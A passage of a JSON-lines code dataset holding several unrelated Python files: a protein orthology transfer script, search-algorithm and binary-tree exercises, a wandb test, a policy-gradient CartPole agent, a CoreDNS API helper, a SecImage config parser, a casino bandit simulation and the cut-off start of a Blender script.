target_proteins = rbh_dict[parasite + \"_\" + target_parasite][parasite_prot]\n if target_proteins:\n for target_prot in target_proteins: \n new_score = (score - PRIOR) * (target_prot[1]) ** alpha + PRIOR\n transferred_ppis.append((host, host_prot, target_parasite, target_prot[0], new_score))\n\n for target_hp_pair in target_hp:\n target_proteins_host = rbh_dict[host + \"_\" + target_hp_pair[0]][host_prot]\n target_proteins_parasite = rbh_dict[parasite + \"_\" + target_hp_pair[1]][parasite_prot]\n if target_proteins_host and target_proteins_parasite:\n # iterate over rbh's in host and parasite\n for target_prot_host in target_proteins_host:\n for target_prot_parasite in target_proteins_parasite:\n new_score = (score - PRIOR) * (target_prot_host[1] * target_prot_parasite[1]) ** alpha + PRIOR\n transferred_ppis.append((target_hp_pair[0], target_prot_host[0], target_hp_pair[1], target_prot_parasite[0], new_score))\n\n transferred_ppis_df = pd.DataFrame(transferred_ppis, columns = [\"taxid1\", \"prot1\", \"taxid2\", \"prot2\", \"score\"])\n transferred_ppis_df[\"channel\"] = evidence[\"channel\"][0]\n transferred_ppis_df = transferred_ppis_df[[\"channel\", \"taxid1\", \"prot1\", \"taxid2\", \"prot2\", \"score\"]]\n\n return(transferred_ppis_df)\n\n\nif __name__ == \"__main__\":\n\n parasite_host_pairs_path = sys.argv[1]\n transfer_pairs_path = sys.argv[2]\n evidence_path = sys.argv[3]\n simap_rbh_path = sys.argv[4]\n parasite_host_pairs_split_path = sys.argv[5]\n PRIOR = float(sys.argv[6])\n output_file = sys.argv[7]\n\n transferred_ppis_df = orthology_transfer(parasite_host_pairs_path, transfer_pairs_path, evidence_path, parasite_host_pairs_split_path, simap_rbh_path, PRIOR)\n \n transferred_ppis_df.to_csv(output_file, sep=\"\\t\", compression=\"gzip\", index=False, header=False)\n","repo_name":"HenriettaHolze/parasite-string-pipeline","sub_path":"scripts/orthology_transfer_host_parasite_interactions_generalized.py","file_name":"orthology_transfer_host_parasite_interactions_generalized.py","file_ext":"py","file_size_in_byte":10238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12950753120","text":"import random\nfrom sortingAlgorithms import mergeSort\n\nlinearComparisons = 0\nbinaryComparisons = 0\nindividualBinary = 0\nindividualLinear = 0\n\ndef linearSearch(A, target):\n global linearComparisons\n global individualLinear\n location = 0 # Location is the index of comparison\n while location < len(A): # Ensures we dont go out of array\n individualLinear +=1 # Updates counters\n linearComparisons +=1\n if A[location] == target: # Compares values to target\n flag = True\n break # Stop if we find the target\n else:\n flag = False\n location +=1 # Move onto next index\n return(flag)\n\n\n\ndef binarySearch(A,start,stop,target):\n global binaryComparisons # Gives method access to global var\n global individualBinary\n flag = False\n midpoint = int((start + stop)/2) # Sets midpoint to middle\n binaryComparisons += 1 # Updates counters\n individualBinary += 1\n if start > stop: # Makes sure we havent exhausted search\n flag = False\n elif (A[midpoint] == target): # Compares target\n flag = True\n location = midpoint\n elif (target < A[midpoint]): # Searches lower\n binarySearch(A,start, midpoint-1, target)\n else: # Searches upper\n binarySearch(A, midpoint+1,stop,target)\n\n return(flag)\n\n\ndef main():\n f = open('magicitems.txt',\"r\")\n magicitems = list(f)\n f.close\n magicitems = [x.strip() for x in magicitems]\n magicitems = [x.lower() for x in magicitems]\n magicitems = [x.replace(' ','') for x in magicitems]\n\n a = mergeSort(magicitems)\n\n\n\n timesToCheck = 42\n randomItems = []\n for i in range(timesToCheck):\n randomItems.append(random.choice(a))\n\n for i in randomItems:\n global individualLinear\n linearSearch(a,i)\n print(\"Comparisons Linear Search: \", individualLinear)\n individualLinear = 0\n\n \n for i in randomItems:\n global individualBinary\n binarySearch(a,0,len(a),i)\n\n print(\"Comparisons Binary Search: \", individualBinary)\n individualBinary = 0\n\n\n print(\"-----------------------------------------------\")\n print(\"Searching Algorithm | Comparisons \")\n print(\"---------------------|-------------------------\")\n print(\"Linear Search: \",\" | \", linearComparisons/timesToCheck)\n print(\"Bianry Search: \",\" | \", binaryComparisons/timesToCheck)\n\n\nmain()\n","repo_name":"NicholasMaisel/Algorithms","sub_path":"searchAlgorithms.py","file_name":"searchAlgorithms.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8395531331","text":"\"\"\"\ntime resolution full tests.\n\"\"\"\n\nimport time\n\nimport wandb\n\n\ndef test_resume(live_mock_server, test_settings, parse_ctx):\n live_mock_server.set_ctx({\"resume\": True})\n\n before = time.time()\n with wandb.init(settings=test_settings, resume=\"allow\") as run:\n for i in range(10):\n run.log(dict(k=i))\n time.sleep(0.000010) # 10 us\n after = time.time()\n\n ctx_util = parse_ctx(live_mock_server.get_ctx())\n history = ctx_util.history\n history_updates = ctx_util.get_filestream_file_updates()[\"wandb-history.jsonl\"]\n\n assert history_updates[0][\"offset\"] == 15\n assert len([h for h in history if h]) == 10\n assert [h for h in history if h][0][\"_step\"] == 16\n assert any([h[\"_timestamp\"] % 1 > 0 for h in history if h])\n assert any([h[\"_runtime\"] % 1 > 0 for h in history if h])\n assert all([before <= h[\"_timestamp\"] <= after for h in history if h])\n assert all([h[\"_runtime\"] >= 70 for h in history if h])\n","repo_name":"wandb/wandb","sub_path":"tests/pytest_tests/unit_tests_old/test_time_resolution.py","file_name":"test_time_resolution.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"24329299691","text":"tree = [0 for x in range(10)]\n\ndef root(root):\n if tree[0] == 0:\n tree[0] = root\n else:\n print(\"Tree already had root\")\n\n return 0\n\ndef set_right(child, parent):\n if tree[parent]:\n tree[(2*parent)+2] = child\n return\n else:\n print(\"can't insert child {0} parent is not found\".format(parent))\n\ndef set_left(child, parent):\n if tree[parent]:\n tree[(2*parent)+1] = child\n return\n else:\n print(\"can't insert child {0} parent is not found\".format(parent))\n\n\ndef print_tree():\n for i in tree:\n print(i)\n\nif __name__==\"__main__\":\n root('A')\n set_left('B',0)\n set_right('C',0)\n set_right('E', 1)\n set_left('D', 1)\n set_right('F', 2)\n print_tree()\n","repo_name":"prasilla487/Python_excersizes_DSA","sub_path":"trees/array_bt.py","file_name":"array_bt.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35535866529","text":"import torch\nimport gym\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport torch.optim as optim\nimport math\nfrom torch.distributions import Categorical\nimport matplotlib.pyplot as plt\nfrom itertools import count\nenv = gym.make('CartPole-v1')\n\n\nclass PG_network(nn.Module):\n def __init__(self):\n super(PG_network, self).__init__()\n self.linear1 = nn.Linear(4, 128)\n self.dropout = nn.Dropout(p=0.6)\n self.linear2 = nn.Linear(128, 2)\n\n # self\n # self.optimizer = optim.Adam(self.parameters(),lr=1e-2)\n\n def forward(self, x):\n x = self.linear1(x)\n x = self.dropout(x) #减少过拟合\n x = F.relu(x)\n action_scores = self.linear2(x)\n # x = self.dropout(x)\n # x = F.relu(x).unsqueeze(0)\n # x = x.unsqueeze(0)\n return F.softmax(action_scores, dim=1)\n # maxvalue,index = torch.max(x,dim=1)\n # y = x.squeeze(0)\n # action_random = np.random.choice(y.detach().numpy())\n # print(action_random)\n # return x\n\n\npolicyG_object = PG_network()\noptimizer = optim.Adam(policyG_object.parameters(), lr=1e-2)\npossibility_store = []\nr_store = []\n\n\ndef choose_action(s):\n s = torch.from_numpy(s).float().unsqueeze(0) #state\n probs = policyG_object(s)\n \"\"\"\n 作用是创建以参数probs为标准的类别分布,样本是来自 “0 … K-1” 的整数,其中 K 是probs参数的长度。\n 也就是说,按照传入的probs中给定的概率,在相应的位置处进行取样,取样返回的是该位置的整数索引。\n\n 如果 probs 是长度为 K 的一维列表,则每个元素是对该索引处的类进行抽样的相对概率。\n\n 如果 probs 是二维的,它被视为一批概率向量。\n\n \"\"\"\n m = Categorical(probs)\n action = m.sample()\n b = m.log_prob(action)\n\n possibility_store.append(m.log_prob(action))\n return action.item()\n\n\nalpha = 0.9\ngammar = 0.9\nreward_delay = 0.9\n# finfo函数是根据height.dtype类型来获得信息,获得符合这个类型的float型,eps是取非负的最小值。\neps = np.finfo(np.float64).eps.item()\n# R_store = []\n\n\ndef policy_gradient_learn():\n R = 0\n R_store = []\n delta_store = []\n # theta = -torch.log10()\n for r in r_store[::-1]:\n R = r + reward_delay*R\n R_store.insert(0, R)\n R_store = torch.tensor(R_store)\n R_store = (R_store - R_store.mean())/(R_store.std()+eps)\n\n # zip() 函数用于将可迭代的对象作为参数,将对象中对应的元素打包成一个个元组,然后返回由这些元组组成的对象,这样做的好处是节约了不少的内存。\n for p, v in zip(possibility_store, R_store):\n delta_store.append(-p*v)\n optimizer.zero_grad()\n\n delta_store = torch.cat(delta_store).sum() #cat:拼接两个序列\n\n delta_store.backward()\n optimizer.step()\n del possibility_store[:] # del删除的是变量,而不是数据。\n del r_store[:]\n # print(loss)\n\n\ndef main():\n running_reward = 10\n for i_episode in count(1):\n s, ep_reward = env.reset(), 0\n for t in range(1, 10000):\n # env.render()\n a = choose_action(s)\n s, r, done, info = env.step(a)\n r_store.append(r)\n ep_reward += r\n # print(r,a)\n if done:\n break\n\n running_reward = 0.05 * ep_reward + (1 - 0.05) * running_reward\n policy_gradient_learn()\n if i_episode % 10 == 0:\n print('Episode {}\\tLast reward: {:.2f}\\tAverage reward: {:.2f}'.format(\n i_episode, ep_reward, running_reward))\n if running_reward > env.spec.reward_threshold:\n print(\"Solved! Running reward is now {} and \"\n \"the last episode runs to {} time steps!\".format(running_reward, t))\n\n # torch.save(policy.state_dict(),'hello.pt')\nif __name__ == '__main__':\n main()\n","repo_name":"PtCu/RL","sub_path":"Policy-Gradients/CartPole.py","file_name":"CartPole.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33584860638","text":"import requests\nfrom libs.constants import ROOT_ZONE, HTTP\n\n\ndef call_api(path, method=HTTP.GET, data=None):\n url = f\"{ROOT_ZONE}/{path}\"\n if method == HTTP.GET:\n res = requests.get(url)\n if res.status_code != 200:\n raise Exception(f\"{method}: {path} returned {res.status_code}\")\n elif method == HTTP.POST:\n res = requests.post(url, data)\n elif method == HTTP.DELETE:\n res = requests.delete(url)\n elif method == HTTP.PUT:\n res = requests.put(url, data)\n else:\n raise Exception(f\"{method} is not supported\")\n return res\n","repo_name":"ehan1990/coredns-web","sub_path":"libs/cmd_helper.py","file_name":"cmd_helper.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15317234888","text":"import os\n\nimport defines as defines\n\nfrom sectools.common.utils import c_config, c_path\nfrom sectools.common.utils.c_logging import logger\nfrom sectools.common.utils.c_misc import get_dups_in_list\nfrom sectools.common.crypto.common_classes import HmacParams\n\n\nclass ConfigDir(object):\n \"\"\"Processes a given config directory to discover the available secimage\n config files in the directory.\n\n :param str config_dir: Path to the directory containing the config files.\n \"\"\"\n\n def __init__(self, config_dir):\n \"\"\"Initializations and checks\"\"\"\n if not c_path.validate_dir(config_dir):\n raise RuntimeError('Directory doesnt exist: ' + config_dir)\n\n # First level of directory that is expected\n sub_config_dir = c_path.join(config_dir, defines.CONFIG_DIR_BASENAME)\n try:\n c_path.validate_dir(sub_config_dir)\n except Exception as e:\n raise RuntimeError('Directory ' + config_dir + '\\n'\n ' ' + 'must contain configs sub directory: ' + defines.CONFIG_DIR_BASENAME)\n\n self.config_dir = sub_config_dir\n\n def _get_config_path(self, chipset_dir):\n \"\"\"Returns the config found in the chipset dir matching\n the naming conventions. If the config file is not found\n in the dir, None is returned.\n\n :param str chipset_dir: The directory in which to look for config path.\n :returns: config_file\n :rtype: (str)\n \"\"\"\n config = None\n chipset_from_dir_name = os.path.basename(chipset_dir)\n\n for entry in os.listdir(chipset_dir):\n path = c_path.join(chipset_dir, entry)\n if c_path.validate_file(path) and entry.endswith(defines.XML_NAME_ENDING):\n # Extract the chipset from the file\n try:\n chipset_from_file = ConfigParser.get_chipset_from_file(path)\n except Exception as e:\n logger.warning('Skipping file: ' + entry + '\\n'\n ' ' + 'Failed to load the file: ' + str(e))\n continue\n\n # Check the naming conventions\n if chipset_from_file == chipset_from_dir_name:\n config = path\n else:\n logger.warning('Skipping file: ' + entry + '\\n'\n ' ' + 'Chipset from file: \"' + chipset_from_file + '\" does not match chipset from dir name: \"' + chipset_from_dir_name + '\"')\n else:\n logger.debug2('Skipping file: ' + entry + '\\n'\n ' ' + 'Name does not match any of the naming convention patters')\n logger.debug2('Config path found for chipset_dir: ' + chipset_dir + '\\n'\n ' ' + 'config: ' + str(config))\n return config\n\n @property\n def config_paths(self):\n \"\"\"(list[tuple(str)]) List of the config paths found in the workspace\n conforming to the naming structure.\n \"\"\"\n config_dir = self.config_dir\n config_paths = []\n\n logger.debug('Searching config path sets in dir: ' + config_dir)\n for entry in os.listdir(config_dir):\n path = c_path.join(config_dir, entry)\n if c_path.validate_dir(path):\n config = self._get_config_path(path)\n if config:\n config_paths.append(config)\n else:\n logger.debug2('Skipping dir: ' + entry + '\\n'\n ' ' + 'Does not contain any configs')\n else:\n logger.debug2('Skipping file in first level: ' + entry)\n logger.debug('Config paths found from the config dir: ' + str(config_paths))\n return config_paths\n\n @property\n def configs(self):\n \"\"\"(list[obj]) List of objects of :class:`ConfigParser` generated by\n loading the config files in the config_dir.\n \"\"\"\n configs = []\n for path in self.config_paths:\n logger.debug2('Loading config: ' + path)\n try:\n configs.append(ConfigParser(path))\n except Exception as e:\n logger.warning('Failed to load config: ' + path + '\\n'\n ' ' + 'Error: ' + str(e))\n return configs\n\n @property\n def chipsets(self):\n \"\"\"(list[str]) List of chipset names supported by the configs in the\n config dir.\n \"\"\"\n chipsets = []\n for config in self.configs:\n chipsets.append(config.chipset)\n logger.debug('Chipsets found from the configs: ' + str(chipsets))\n return chipsets\n\n @config_paths.setter\n def config_paths(self, value):\n raise RuntimeError('Config_Paths in a config dir cannot be set.')\n\n @configs.setter\n def configs(self, value):\n raise RuntimeError('Configs in a config dir cannot be set.')\n\n @chipsets.setter\n def chipsets(self, value):\n raise RuntimeError('Chipsets in a config dir cannot be set.')\n\n def get_chipset_dir(self, chipset):\n \"\"\"Returns the expected path within the config dir for the chipset\n\n :param str chipset: The chipset for which directory path is queried.\n \"\"\"\n return c_path.join(self.config_dir, chipset)\n\n def create_chipset_dir(self, chipset):\n \"\"\"Creates the directory in the config dir for the chipset\n\n :param str chipset: The chipset for which directory needs to be\n created\n :raises: RuntimeError - If directory creation fails\n \"\"\"\n try:\n c_path.create_dir(self.get_chipset_dir(chipset))\n except Exception as e:\n raise RuntimeError('Failed to create directory for chipset: ' + chipset + '\\n'\n ' ' + 'Error: ' + str(e))\n\n def get_chipset_config_path(self, chipset):\n \"\"\"\n :param str chipset: chipset to return config file for\n :returns: config path corresponding to the given chipset\n :rtype: str\n \"\"\"\n logger.debug('Searching configs corresponding to chipset: ' + chipset)\n chipset_dir = c_path.join(self.config_dir, chipset)\n\n if c_path.validate_dir(chipset_dir):\n return self._get_config_path(chipset_dir)\n raise RuntimeError('Did not find config for chipset: \"' + chipset + '\"')\n\n\nclass ConfigParser(c_config.CoreConfig):\n \"\"\"Parses the SecImage configuration file using c_config.CoreConfig and\n the module auto-generated using generateDS (auto_gen_xml_config).\n\n :param str config_path: Path to the config file to be parsed.\n\n .. data: root\n\n Root class representing the structure of the config file.\n\n .. data:: __version__ = 1.1\n\n Version of the Config Parser\n\n \"\"\"\n\n __version__ = '1.2'\n\n def __init__(self, config_path):\n \"\"\"Initializations and checks\"\"\"\n import auto_gen_xml_config, auto_gen_obj_config\n\n assert isinstance(config_path, str)\n self.config_module = auto_gen_xml_config\n self.obj_module = auto_gen_obj_config\n c_config.CoreConfig.__init__(self, self.config_module, config_path)\n self.validate()\n\n def validate(self):\n \"\"\"Normalizes and validates the data in the secimage xml.\n\n :raises: RuntimeError if config is determined to be invalid\n \"\"\"\n c_config.CoreConfig.validate(self, defines.CONFIG_STRUCTURE)\n\n # Validate root config rules\n from rule import ConfigRulesManager\n rules = ConfigRulesManager()\n rules.validate(self, defines.CONFIG_STRUCTURE)\n\n # Check that the version matches\n config_version = self.version\n if config_version != self.__version__:\n raise RuntimeError('Version of parser: \"' + self.__version__ + '\" does not match version from config \"' + config_version + '\"')\n\n # Check that atleast one image_type was provided\n image_type_id_list = [image_type.id for image_type in self._get_parsegen_image_type_list()]\n if len(image_type_id_list) == 0:\n raise RuntimeError('Config file must contain at least one image_type under parsegen->image_types_list')\n\n # Check that the ids of the image_type objects are unique\n dup_image_type_id_list = get_dups_in_list(image_type_id_list)\n if len(dup_image_type_id_list):\n raise RuntimeError('image_type ids must be unique. Found multiple image_types with same id: ' + str(dup_image_type_id_list))\n\n # Check that the ids of the cert_configs_list are unique\n cert_config_id_list = [cert_config.id for cert_config in self._get_signing_local_cert_config_list()]\n dup_cert_config_id_list = get_dups_in_list(cert_config_id_list)\n if len(dup_cert_config_id_list):\n raise RuntimeError('cert_config ids must be unique. Found multiple cert_configs with same id: ' + str(dup_cert_config_id_list))\n\n # Check that atleast one image was provided\n sign_id_list = self.sign_id_list\n if len(sign_id_list) == 0:\n raise RuntimeError('Config file must contain at least one image under the images_list')\n\n # Check that the ids of the image objects are unique\n dup_sign_id_list = get_dups_in_list(sign_id_list)\n if len(dup_sign_id_list):\n raise RuntimeError('image sign_ids must be unique. Found multiple images with the same sign_id: ' + str(dup_sign_id_list))\n\n def generate(self, file_path):\n \"\"\"Generates the secimage config file with the current configuration\n of the root node.\n\n :param str file_path: path to the config file that should be generated\n with the current data\n \"\"\"\n logger.note('Generating config file...')\n c_config.CoreConfig.generate(self, file_path,\n defines.XML_ROOTNODE,\n defines.XML_NAMESPACE,\n defines.XML_PREPEND_LINES)\n logger.note('Generated config file at: ' + str(file_path))\n\n def transfer_from_obj(self, obj):\n \"\"\"Updates the values of the config root node using the attributes of\n the object provided.\n\n :param Cfg_Secimage obj: Object to be used for obtaining the values.\n \"\"\"\n assert isinstance(obj, self.obj_module.Cfg_Secimage)\n logger.debug('Updating config contents using object: ' + obj)\n self.root = self.transfer_from_obj_to_node(obj,\n self.root,\n defines.CONFIG_STRUCTURE,\n defines.ROOTNODE_NAME)\n logger.debug('Config contents updated.')\n\n def transfer_to_obj(self, obj):\n \"\"\"Updates the attributes of the object provided using the values of the\n root config node.\n\n :params: same as :meth:`transfer_from_obj`\n \"\"\"\n assert isinstance(obj, self.obj_module.Cfg_Secimage)\n logger.debug('Updating object using config contents: ' + obj)\n obj = self.transfer_from_node_to_obj(self.root,\n obj,\n defines.CONFIG_STRUCTURE,\n defines.ROOTNODE_NAME,)\n logger.debug('Object updated using the config.')\n\n def transfer_from_obj_to_node(self, obj, node, structure, structure_parent):\n return self.transfer(obj,\n node,\n structure,\n structure_parent,\n self.config_module,\n defines.XML_CLASSNAME_GEN)\n\n def transfer_from_node_to_obj(self, node, obj, structure, structure_parent):\n return self.transfer(node,\n obj,\n structure,\n structure_parent,\n self.obj_module,\n defines.OBJ_CLASSNAME_GEN)\n\n @property\n def chipset(self):\n \"\"\"\n :returns: Name of the chipset.\n :rtype: str\n \"\"\"\n return self.root.metadata.chipset\n\n @property\n def version(self):\n \"\"\"\n :returns: Version of the config file.\n :rtype: str\n \"\"\"\n return self.root.metadata.version\n\n @property\n def config_data(self):\n \"\"\"\n :returns: Config object\n :rtype: obj\n \"\"\"\n return self.root\n\n @property\n def sign_id_list(self):\n \"\"\"\n :returns: sign_ids available in the config file\n :rtype: list[str]\n \"\"\"\n return [image.sign_id for image in self._get_image_list()]\n\n def get_sign_id_for_image_name(self, image_name):\n \"\"\"\n :param str image_name: Image name for which the sign id is needed.\n :returns: sign_id corresponding to the image_name provided.\n :rtype: str\n :raises RuntimeError: If None or multiple sign_ids are found for the\n given image_name.\n \"\"\"\n assert isinstance(image_name, str)\n\n # Look for all the matching sign ids\n sign_ids_found = []\n for image in self._get_image_list():\n if image.name and image.name.lower() == image_name.lower():\n sign_ids_found.append(image.sign_id)\n\n # Raise error if None or multiple sign ids are found\n if len(sign_ids_found) == 0:\n raise RuntimeError('Sign Id not found for image name: ' + image_name)\n elif len(sign_ids_found) > 1:\n raise RuntimeError('Multiple sign ids found for image name: ' + image_name + '\\n'\n ' ' + 'Sign Ids: ' + str(sign_ids_found))\n else:\n return sign_ids_found[0]\n\n def get_config_for_sign_id(self, sign_id):\n \"\"\"\n :param str sign_id: Sign id for which the config block is needed.\n :returns: config block corresponding to the sign_id provided.\n :rtype: obj\n :raises RuntimeError: If sign_id does not correspond to a config block.\n \"\"\"\n assert isinstance(sign_id, str)\n for image in self._get_image_list():\n if image.sign_id == sign_id:\n return image\n raise RuntimeError('Config block not found for sign id: ' + sign_id)\n\n def get_hmac_params_from_config(self, sign_id):\n \"\"\"\n :returns: A HMAC object with the HMAC parameters from the config file.\n :rtype: obj\n \"\"\"\n sign_id_config_block=self.get_config_for_sign_id(sign_id)\n msm_part = self.root.signing.default_attributes.msm_part\n oem_id = self.root.signing.default_attributes.oem_id\n model_id= self.root.signing.default_attributes.model_id\n msm_id = msm_part + oem_id[2:] + model_id[2:]\n msm_id = int(msm_id,16)\n sw_id = sign_id_config_block.signing_attributes_overrides.sw_id\n sw_id = int(sw_id,16)\n return HmacParams(msm_id,sw_id)\n\n def _get_image_list(self):\n \"\"\"\n :returns: list of image objects from the config file\n :rtype: list[obj]\n \"\"\"\n return self.root.images_list.image\n\n def _get_parsegen_image_type_list(self):\n \"\"\"\n :returns: list of image_type objects from the config file\n :rtype: list[obj]\n \"\"\"\n return self.root.parsegen.image_types_list.image_type\n\n def _get_signing_local_cert_config_list(self):\n \"\"\"\n :returns: list of cert_config objects from the config file\n :rtype: list[obj]\n \"\"\"\n return self.root.signing.signer_attributes.local_signer_attributes.cert_configs_list.cert_config\n\n def _set_signing_local_cert_config_list(self, cert_config_nodes_list):\n \"\"\"\n :param cert_config_nodes_list: list[auto_gen_xml_config.complex_cert_config]\n \"\"\"\n assert isinstance(cert_config_nodes_list, list)\n for cert_config in cert_config_nodes_list:\n assert isinstance(cert_config, self.config_module.complex_cert_config)\n self.root.signing.signer_attributes.local_signer_attributes.cert_configs_list.cert_config = cert_config_nodes_list\n\n @classmethod\n def get_chipset_from_file(self, path):\n return ConfigParser(path).chipset\n\n\n#------------------------------------------------------------------------------\n# Restrict all import\n#------------------------------------------------------------------------------\n__all__ = ['ConfigDir',\n 'ConfigParser',\n 'defines',\n 'auto_gen_obj_config']\n","repo_name":"bcyj/android_tools_leeco_msm8996","sub_path":"common/scripts/SecImage/sectools/features/isc/cfgparser/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16669,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"30692064224","text":"import random\nimport numpy as np\nfrom scipy.stats import beta\nfrom memoization import cached\n\n# there are N casinos\n# each casino_i initially has 0 arms, however\n# each casino_i is equipted with a slot-machine maker \n# assume the slot machine maker is Unif(a_i, opt_i)\n# where a_i < opt_i < 1\n\n# you can take 2 kinds of actions:\n# a) go to a casino and pull from an existing machine.\n# the machine give a 0,1 outcome from Bernuli(mu)\n# where mu is the hidden parameter of the machine\n#\n# b) go to a casino, and pull from a new machine\n# the casino first sample a new machine mu_new ~ Unif(a_i, opt_i)\n# this machine is added to the casino permanently,\n# you receive a 0,1 outcome from Bernuli(mu_new)\n\n# your goal is to find 1 good slot machine per casino, specifically\n# give an online algorithm that, after a number of interactions\n# return one slot machine from each casino: mu_1 ... mu_10\n# minimizing the total \"regret\" :\n# total_regret = (opt_1 - mu_1) + ... + (opt_10 - mu_10)\n\n# ======== THE ENVIRONMENT MODEL =========\n\nN = 3\nBudget = 16 * N\n\n# make N casinos, each casino_i paramterized by (a_i, opt_i)\ndef make_casino_params():\n def make_pair():\n a_i = random.random()\n opt_i = random.random()\n if a_i < opt_i:\n return a_i, opt_i\n else:\n return make_pair()\n return [make_pair() for _ in range(N)]\n\nclass CasEnv:\n def __init__(self, casino_params):\n self.casino_params = casino_params\n self.casinos = None\n\n # cache the result of sampling new arms to casinos\n self.casino_cache = dict()\n self.arm_cache = dict()\n\n def reset(self):\n # N empty casinos\n self.casinos = [[] for _ in range(N)]\n # initial observations at each casino\n self.ob = [[] for _ in range(N)]\n return self.ob\n\n def step(self, action):\n cas_id, arm_id = action\n assert arm_id in range(-1, len(self.casinos[cas_id])), \"ARM NO EXIST CYKA\"\n # -1 means sample new arm, so we sample one\n if arm_id == -1:\n\n # we use cache so the arms of the casino are consistent across different runs of the env as the first time\n # the casino cache id is the casino id, and the number of arm being tried out\n casino_cache_key = (cas_id, len(self.casinos[cas_id]))\n\n if casino_cache_key not in self.casino_cache:\n to_add = random.uniform(*self.casino_params[cas_id])\n self.casino_cache[casino_cache_key] = to_add\n\n new_arm_mu = self.casino_cache[casino_cache_key]\n self.ob[cas_id].append([])\n self.casinos[cas_id].append(new_arm_mu)\n\n # pull from the selected arm (-1 works nicely here lol)\n arm_result = 1 if random.random() < self.casinos[cas_id][arm_id] else 0\n self.ob[cas_id][arm_id].append(arm_result)\n return self.ob\n\n def check_answer(self, guess):\n total_regret = 0\n for cas_id, arm_id in enumerate(guess):\n guessed_arms_mu = 0\n if arm_id in range(len(self.casinos[cas_id])):\n guessed_arms_mu = self.casinos[cas_id][arm_id]\n opt = self.casino_params[cas_id][1]\n regret = opt - guessed_arms_mu\n total_regret += regret\n return total_regret\n\n\n# ========= A Naive Policy ==========\nclass NaivePolicy:\n\n # for faster computation, cache the state-action pair\n def __init__(self):\n self.cache = dict()\n\n # if a casino is empty, sample a new arm\n # otherwise, randomly pull an existing arm or get a new arm\n #@cached \n def act(self, observations):\n for cas_id, cas in enumerate(observations):\n if len(cas) == 0:\n return (cas_id, -1)\n rand_id = random.choice([_ for _ in range(N)])\n rand_arm = random.choice([_ for _ in range(-1, len(observations[rand_id]))]) \n return (rand_id, rand_arm)\n\n def guess(self, observations):\n ret = []\n def arm_quality(arm_ob):\n return sum(arm_ob) / len(arm_ob)\n for cas_ob in observations:\n arm_qual = [arm_quality(arm_ob) for arm_ob in cas_ob]\n ret.append(np.argmax(arm_qual))\n return ret\n\n# ========= A Tile Strategy ===========\nclass TilePolicy(NaivePolicy):\n # always act on the casino with the least number of observations\n # use sqrt rule for allocate new arm, otherwise spread out evenly\n #@cached\n def act(self, observations): \n interaction_per_cas = [sum([len(arm_ob) for arm_ob in cas_ob]) for cas_ob in observations]\n cas_id = np.argmin(interaction_per_cas)\n cas_ob = observations[cas_id]\n cas_interactions = interaction_per_cas[cas_id]\n if len(cas_ob) <= np.sqrt(cas_interactions):\n return (cas_id, -1)\n else:\n poor_arm_id = np.argmin([len(arm_ob) for arm_ob in cas_ob])\n return (cas_id, poor_arm_id)\n\n\n# ========= A Jank Strategy ==========\nclass JankPolicy(NaivePolicy):\n # each casino fixed budget, within casino do ucb\n #@cached\n def act(self, observations):\n interaction_per_cas = [sum([len(arm_ob) for arm_ob in cas_ob]) for cas_ob in observations]\n cas_id = np.argmin(interaction_per_cas)\n cas_ob = observations[cas_id]\n cas_interactions = interaction_per_cas[cas_id]\n if len(cas_ob) <= np.sqrt(cas_interactions):\n return (cas_id, -1)\n else:\n ucbs = []\n for arm_ob in cas_ob:\n a= sum(arm_ob) + 1\n b = len(arm_ob) - a + 1\n mean, var = beta.stats(a, b, moments='mv')\n ucbs.append(mean + np.sqrt(var))\n return (cas_id, np.argmax(ucbs))\n\n# ========== Interacting Between Env and Policy ===========\ndef roll_out(env, policy):\n obs = env.reset()\n for n in range(Budget):\n action = policy.act(obs)\n obs = env.step(action)\n guess = policy.guess(obs)\n return env.check_answer(guess)\n\nif __name__ == '__main__':\n policies = [NaivePolicy(), TilePolicy(), JankPolicy()]\n cums = [0 for _ in policies]\n for i in range(1000):\n cas_par = make_casino_params()\n env = CasEnv(cas_par)\n for j in range(len(cums)):\n policy = policies[j]\n regret = roll_out(env, policy)\n cums[j] += regret\n\n\n print (f\"regret {cums}\")","repo_name":"samacqua/ARC-Turks","sub_path":"python_bandit_formulation/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5145395222","text":"#!/usr/bin/env python3\n\n# bpy-run-from-blender fix.\n# Assumes that commandline arguments are\n# sys.argv[0] = path-to-blender\n# sys.argv[1] = '-b'\n# sys.argv[2] = '-P'\n# sys.argv[3] = path-to-this-script\nimport sys\nimport os\nif sys.argv[0].split('.exe')[0].endswith('blender') and sys.argv[1] == '-b' and sys.argv[2] == '-P':\n origin_script_working_directory = os.path.split(sys.argv[3])[0]\n print(\"setting working directory for imports: '%s'\"%origin_script_working_directory)\n sys.path.insert(0, origin_script_working_directory)\n argv = sys.argv[3:]\nelse:\n argv = sys.argv\n\n# re-run self from within blender if bpy not available.\n# lets you run this script directly, while really running it from within blender's python install.\n# note: the code above is to fix imports (re-add the local working directory to the python search path)\n# when this happens\nfrom run_bpy import run_self\nrun_self()\n\n# End header...\nimport bpy\n\ndef clear_all_objects ():\n print(\"deleting %s objects: %s\"%(\n len(bpy.context.selected_objects),\n bpy.context.selected_objects))\n bpy.ops.object.delete()\n\ndef import_and_join_obj (path, join_into = None):\n print(\"%s objects selected\"%(len(bpy.context.selected_objects)))\n print(\"importing '%s'\"%path)\n result = bpy.ops.import_scene.obj(filepath=path)\n if 'FINISHED' not in result:\n 